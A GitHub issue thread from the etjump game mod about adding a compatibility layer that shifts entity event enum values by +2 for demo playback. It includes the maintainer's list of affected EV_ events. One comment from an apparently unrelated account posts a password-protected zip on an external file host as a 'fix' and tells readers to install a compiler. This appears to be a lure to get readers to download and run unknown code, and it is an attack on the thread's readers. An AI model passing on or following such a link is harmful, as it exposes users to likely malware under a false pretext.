### ISSUE TITLE
Add compatibility layer for shifting EV_ enum

### ISSUE THREAD

**Issue by Aciz** [etjump/etjump#1471]
Before 3.3.0 release, we need to add a compatibility layer for demo playback that shifts `entity_event_t` enum by +2 for specific events, as we've added 2 new entityTypes since 3.2.2 (`ET_TELEPORT_TRIGGER_CLIENT` & `ET_FAKEBRUSH`), and some events are created by setting the event num to `ET_EVENTS + event`. This is done by `G_TempEntity` and `G_PopupMessage`:

https://github.com/etjump/etjump/blob/ddad5a0937167bdf6c7f7263317c00c00c8adc2c/src/game/g_utils.cpp#L590-L628

Sample demo incase I somehow lose this - grenade explosions add `EV_MG42BULLET_HIT_FLESH` instead of `EV_SHAKE` (119 vs 121)

[oasis_nades.dm_84.zip](https://github.com/user-attachments/files/17177296/oasis_nades.dm_84.zip)

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Aciz** [comment]
Events that need this compatibility applied:

```
EV_RAILTRAIL
EV_GLOBAL_CLIENT_SOUND
EV_OBITUARY
EV_GLOBAL_ITEM_PICKUP
EV_GLOBAL_SOUND
EV_SMOKE
EV_MG42BULLET_HIT_WALL
EV_MG42BULLET_HIT_FLESH
EV_MISSILE_HIT
EV_MISSILE_MISS
EV_SHAKE
EV_MORTAR_MISS
EV_MORTAR_IMPACT
EV_BULLET_HIT_FLESH
EV_BULLET_HIT_WALL
EV_MORTAREFX
EV_ITEM_POP
EV_EFFECT
EV_RUBBLE
EV_BUILDDECAYED_SOUND
EV_GUNSPARKS
EV_DUST
EV_OILSLICK
EV_OILSLICKREMOVE
EV_SNOWFLURRY
EV_DEBRIS
EV_ALERT_SPEAKER
EV_GLOBAL_TEAM_SOUND
EV_RUMBLE_EFX
EV_GENERAL_SOUND_VOLUME
EV_GENERAL_CLIENT_SOUND_VOLUME
EV_GENERAL_SOUND
EV_AIRSTRIKEMESSAGE
EV_ARTYMESSAGE
EV_EMITTER
EV_BULLET_HIT_FLESH
EV_BULLET_HIT_WALL
EV_PORTAL_TRAIL
```
